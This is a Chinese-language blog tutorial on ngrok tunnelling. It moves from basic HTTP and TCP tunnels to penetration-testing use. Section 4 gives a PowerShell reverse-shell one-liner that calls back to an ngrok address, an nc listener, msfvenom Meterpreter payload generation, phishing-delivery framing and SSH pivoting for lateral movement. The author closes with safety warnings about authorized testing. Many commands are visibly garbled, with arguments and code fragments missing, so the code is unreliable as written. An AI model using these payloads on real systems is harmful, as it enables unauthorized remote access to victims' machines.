1.

为什么你需要ngrok？一个真实的故事

几年前，我还在一个安全团队里做渗透测试，那时候最头疼的就是测试环境。

客户的内网系统，你总不能抱着电脑跑到人家机房去连网线吧？尤其是那些Web应用或者内部管理平台，它们就安安静静地待在内网里，外网根本摸不着边。

那时候，为了能在外网访问到内网搭建的靶机或者测试工具，我们试过各种“土办法”，比如在客户网络里找台有公网IP的服务器做转发，或者用一些复杂的路由配置，折腾半天还不一定成功，效率极低。

直到后来遇到了ngrok，我才发现原来内网穿透可以这么简单。

简单来说，ngrok就像给你的内网服务装了一个“专属快递员”。

你在内网跑了一个网站（比如在本地电脑用Python起了个http://localhost:8080的服务），ngrok能瞬间为这个服务生成一个公网可以访问的网址，比如https://abc123.ngrok.io。

任何人，在任何有网络的地方，打开这个网址，就能直接访问到你本地运行的服务。

这个“快递员”不仅速度快，还自带加密（HTTPS），非常可靠。

它特别适合这几类人：

• 开发者：想给同事或客户临时展示一个本地开发中的Web项目，不用部署到服务器。

• 运维人员：需要临时从外网访问内网的监控面板、配置页面等。

• 像我这样的安全测试人员：这是我们的“神器”。

  在渗透测试中，我们经常需要在本地（比如Kali

  Linux）运行一些监听工具，等待目标内网的主机“回连”出来。

  有了ngrok，我们就能轻松获得一个公网地址，让内网的“鱼儿”主动游到我们的“钩子”上。

最重要的是，它有一个非常慷慨的免费套餐，对于个人测试和学习来说完全够用。

下面，我就手把手带你从零开始，玩转ngrok，并深入到它在渗透测试中的核心应用。

2.

从注册到“Hello

World”：5分钟搞定基础穿透

别被“内网穿透”这个词吓到，ngrok的入门简单得超乎想象。

整个过程就像注册一个社交账号然后下载一个APP一样。

2.1

获取你的专属“钥匙”

首先，我们需要去ngrok的官网。

打开浏览器，访问ngrok.com。

你会看到一个很清晰的界面，点击右上角的“Sign

up”进行注册。

你可以用邮箱注册，也可以直接用GitHub账号登录，这很方便。

注册并登录后，你会进入控制台（Dashboard）。

在这里，最重要的就是找到你的“Authtoken”（认证令牌）。

这个令牌就像是你家的门禁卡，是ngrok客户端连接到你账户的凭证。

每个人的令牌都是独一无二的。

通常，在“Getting

Started”或“Setup”页面，你能一眼看到它。

它是一长串由字母、数字和下划线组成的字符串，长得像这样：2ANd6OYJXqrT3E0YT5cON84xQHd_2iAGxxxxxxDB8s88HyurdBB。

把它复制下来，或者先让这个页面开着，我们马上要用。

2.2

安装与配置：一行命令的事

ngrok是跨平台的，支持Windows、macOS和Linux。

在官网的下载页面，选择适合你操作系统的版本下载。

对于Linux或macOS用户，我更喜欢用命令行来操作，更快捷。

以Linux为例，下载解压后，你得到一个叫ngrok的可执行文件。

首先，我们要把它和刚才的Authtoken绑定。

打开终端，切换到ngrok所在的目录，然后执行：

./ngrok
config
你的Authtoken

例如：

./ngrok
config
2ANd6OYJXqrT3E0YT5cON84xQHd_2iAGxxxxxxDB8s88HyurdBB

如果看到Authtoken

saved

file类似的提示，恭喜你，配置成功了！这个操作只需要做一次，ngrok会把这个令牌保存在本地配置里，以后每次启动都会自动使用。

2.3

启动你的第一个隧道

现在，让我们来点实际的。

假设你在本地电脑（IP是192.168.1.100）上用Python快速启动了一个简单的HTTP服务器，监听在80端口：

python3
http.server
80

此时，在同一个局域网内的其他电脑，可以通过http://192.168.1.100来访问这个服务器。

但外网是访问不了的。

这时，打开另一个终端窗口，运行ngrok：

./ngrok
http
80

稍等一两秒，你会看到一个非常酷的终端界面。

它会显示两部分重要信息：

1. Forwarding：这里会给出两个公网URL，一个是http://开头的，一个是https://开头的。

   例如https://abc-123-456.jp.ngrok.io。

   这个https的地址就是你的内网80端口在公网上的“化身”。

2. Web

   Interface：通常还有一个本地管理地址，如http://127.0.0.1:4040。

   在浏览器打开这个地址，你能看到一个详细的流量监控面板，所有通过ngrok的请求和响应都能看到，调试时非常有用。

现在，你可以把那个https://abc-123-456.jp.ngrok.io的链接发给你在任何地方的朋友，他们点击就能直接看到你本地电脑上运行的网页了！这就是内网穿透最直观的体验。

3.

不只是HTTP：玩转TCP与自定义域名

基础的HTTP穿透已经很强大了，但ngrok的能力远不止于此。

在更复杂的场景，尤其是渗透测试中，我们需要转发任意TCP流量，比如SSH、数据库端口或者自定义的TCP服务。

3.1

转发TCP端口

ngrok的免费版也支持TCP隧道，这非常实用。

命令格式很简单：

./ngrok
tcp
22

这条命令会将你本地的22号端口（通常是SSH服务）暴露到公网。

执行后，ngrok会生成一个地址，格式类似于：tcp://0.tcp.jp.ngrok.io:12345。

这意味着，0.tcp.jp.ngrok.io这个域名的12345端口，已经被映射到了你内网机器的22端口。

那么，别人如何通过SSH连接你的内网机器呢？在他的SSH客户端里，命令需要这样写：

ssh
12345

这样，SSH连接就会先到达ngrok的服务器，然后被无缝转发到你内网的机器上。

对于转发MySQL（3306）、远程桌面（3389）或者其他任何TCP服务，原理完全一样，只需改变本地端口号即可。

3.2

管理多条隧道与Web界面

当你同时运行多条ngrok隧道时，那个本地的4040端口管理界面就派上大用场了。

在浏览器访问http://127.0.0.1:4040，你会进入一个叫“ngrok

Inspector”的页面。

这个页面简直是个宝藏。

它能实时显示所有隧道的状态、公网地址。

更重要的是，它能捕获并展示每一笔经过隧道的HTTP请求和响应的原始数据，包括Headers、Body等。

这对于调试API接口、分析Web请求问题来说，比很多专业抓包工具还直观方便。

3.3

免费套餐与升级考量

ngrok的免费套餐已经足够大多数人尝鲜和进行轻量级测试了。

它的主要限制在于：

• 每个隧道生成的公网地址是随机的，并且每次重启都会变化。

• 同时可建立的隧道数量有限。

• 每月有流量限制。

对于需要固定地址的正式项目，你可以考虑付费套餐。

付费后，你可以保留一个固定的二级域名（比如yourname.ngrok.io），还可以绑定自己的自定义域名，这样服务地址就完全稳定了。

不过，在渗透测试的很多场景下，随机地址反而更有利于隐蔽性。

4.

渗透测试实战：让内网主机“主动”连接我们

前面都是开胃菜，现在进入最核心的部分——ngrok在渗透测试中的实战应用。

这里的关键思想是“反向连接”。

在复杂的内部网络中，目标机器可能位于多层防火墙或NAT之后，我们无法直接扫描或连接到它。

这时，我们需要让它主动发起连接到我们可控的公网服务器上。

4.1

场景构建：反弹Shell与C2服务器

这是最经典的场景。

假设我们通过某种方式（比如一个钓鱼邮件）在内网的一台Windows机器上执行了一段Payload。

这段Payload的任务是，让这台机器去连接一个公网IP的某个端口，并建立一个Shell会话。

问题来了：我们测试人员的电脑在公司或家里的内网，没有公网IP。

怎么办？ngrok出场。

1. 第一步：准备接收端。

   在我们的Kali

   Linux上，我们使用nc（Netcat）监听一个本地端口，比如4444，等待连接。

   nc
   -lvnp
   4444

   但此时，nc监听的是Kali本地的0.0.0.0:4444，外网无法直接访问。

2. 第二步：用ngrok创建TCP隧道。

   我们新开一个终端，为这个4444端口创建隧道。

   ./ngrok
   tcp
   4444

   ngrok会返回一个公网地址，例如tcp://0.tcp.jp.ngrok.io:56789。

3. 第三步：制作Payload。

   现在，我们制作Payload时，回连地址就不再是我们难以获取的公网IP了，而是这个ngrok提供的地址。

   例如，一个简单的PowerShell反弹Shell命令会变成：

   powershell
   "$client
   System.Net.Sockets.TCPClient('0.tcp.jp.ngrok.io',56789);$stream
   =
   $client.GetStream();[byte[]]$bytes
   =
   System.Text.ASCIIEncoding).GetString($bytes,0,
   $i);$sendback
   ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

   当内网的目标机器执行这段代码时，它会去连接0.tcp.jp.ngrok.io:56789。

4. 第四步：连接建立。

   ngrok的服务器接收到这个连接请求，立刻将其转发到我们Kali本地的4444端口。

   此时，我们运行nc

   -lvnp

   4444的终端窗口里，就会弹出一个来自内网目标的Shell！我们成功绕过了所有的内网边界限制。

4.2

进阶应用：转发Metasploit的监听器

在实际渗透中，我们更常使用Metasploit

Framework来生成Payload和建立监听。

ngrok同样可以完美配合。

1. 在Kali上，我们先启动ngrok转发一个TCP端口，比如5555。

   ./ngrok
   tcp
   5555

   假设得到地址tcp://1.tcp.jp.ngrok.io:23456。

2. 接着，在msfconsole里，我们设置一个反向TCP的Payload（windows/x64/meterpreter/reverse_tcp），并配置监听器。

   msf6
   >
   windows/x64/meterpreter/reverse_tcp
   msf6
   run

3. 当我们生成Windows的Meterpreter

   Payload时，需要将LHOST设置为ngrok的公网地址和端口。

   msfvenom
   windows/x64/meterpreter/reverse_tcp
   LPORT=23456
   payload.exe

这样，当目标运行payload.exe后，Meterpreter会话就会通过ngrok隧道，稳定地回连到我们的Metasploit监听器上。

4.3

端口转发与内网横向移动

拿到一个内网跳板机（比如通过上面的反弹Shell）后，我们经常需要借助它去访问内网中其他无法直接到达的机器和服务。

这就是内网横向移动。

例如，我们发现跳板机内网里有一台Web服务器（192.168.10.20:80），我们想在本地的浏览器中直接访问它进行研究。

我们可以在跳板机上使用ngrok（如果跳板机能执行我们的程序的话），或者更常见的，在我们已控的Kali上，通过SSH本地端口转发结合ngrok来实现。

1. 首先，通过已有的Shell，在跳板机上建立一个到我们Kali的SSH反向隧道（假设跳板机有SSH客户端）。

   #
   在跳板机上执行，将它的本地2222端口转发到Kali的22端口（需Kali有公网或ngrok）
   ssh
   隧道端口

   这步需要我们先为Kali的22端口建立一个ngrok

   TCP隧道。

2. 然后，在我们本地的Kali上，再通过这个连接，将内网Web服务器的端口转发出来。

   #
   在Kali上执行，通过跳板机的2222端口，将内网80端口转发到Kali本地的8080端口
   ssh
   localhost

3. 最后，为我们Kali本地的8080端口再开一个ngrok

   http

   8080

现在，访问ngrok提供的HTTPS网址，就相当于访问了内网深处的192.168.10.20:80。

这个过程虽然有点绕，但在实战中，这种多层转发是突破网络分区、访问隔离区域的常用技巧。

ngrok在其中扮演了最外层“公网接入点”的关键角色。

5.

安全警示与避坑指南

工具越强大，责任也越大。

ngrok在提供便利的同时，也带来了不可忽视的安全风险，使用时必须格外小心。

5.1

你暴露了哪些风险？

当你运行./ngrok

http

80时，你不仅仅是把本地的一个网页服务暴露了出去。

如果这个80端口上运行的是一个有漏洞的Web应用（比如一个旧的测试用CMS）、一个配置不当的服务管理界面（比如路由器后台），那么互联网上的任何扫描器或恶意攻击者，都可能通过这个随机的ngrok域名发现并攻击它。

更危险的是TCP隧道。

如果你把本机的SSH（22）、远程桌面（3389）、数据库（3306/5432）等管理端口暴露到公网，而密码又不够强壮，几乎等同于向全网敞开了大门。

攻击者会利用这些隧道地址进行暴力破解，一旦成功，你的内网机器就沦陷了。

5.2

给你的隧道加上“密码锁”

ngrok提供了一些基础的安全配置，强烈建议在使用时加上。

• 身份验证：对于HTTP隧道，可以要求访问者输入用户名和密码。

  ./ngrok
  http
  --basic-auth="用户名:密码"
  80

  这样，访问者需要在浏览器弹出的认证框中输入正确的凭据才能看到页面。

• IP白名单：在付费套餐中，你可以设置只允许特定的IP地址访问你的隧道，这能极大提升安全性。

• 仅用于临时测试：这是最重要的原则。

  永远不要将ngrok隧道用于暴露生产环境服务、包含真实数据的数据库或任何关键系统。

  它应该只用于开发调试、演示和授权的安全测试。

  隧道一旦用完，立即在终端按Ctrl+C关闭它。

5.3

网络稳定性与替代方案

ngrok的免费服务器在海外，国内直接连接有时速度不稳定或延迟较高，可能会影响反向Shell的体验。

如果你遇到连接经常中断的问题，可以考虑以下方向：

1. 自建ngrok服务器：ngrok是开源的，你可以购买一台国内的云服务器，自己搭建ngrok服务端和客户端。

   这样你就能完全控制隧道的速度和稳定性，也避免了使用公共域名。

   这个过程需要一些Linux运维知识，但网上有非常详细的教程。

2. 国内类似工具：也有一些国内开发者提供的类似内网穿透工具，它们在国内有服务器节点，连接速度可能更快。

   在选择时，务必注意工具的安全性和可信度。

在我自己的渗透测试项目中，ngrok已经成了一个标准配置。

它解决的不是技术难题，而是一个纯粹的“连接性”痛点。

我记得有一次在红队演练中，就是靠一个稳定的ngrok

TCP隧道，才成功接收到了从目标核心办公区反弹出来的Shell，那种“通了！”的瞬间，感觉之前所有的折腾都值了。

工具本身没有好坏，关键在于用它的人。

希望你能安全、合规地利用ngrok，让它成为你技术工具箱里又一枚得力的“螺丝刀”。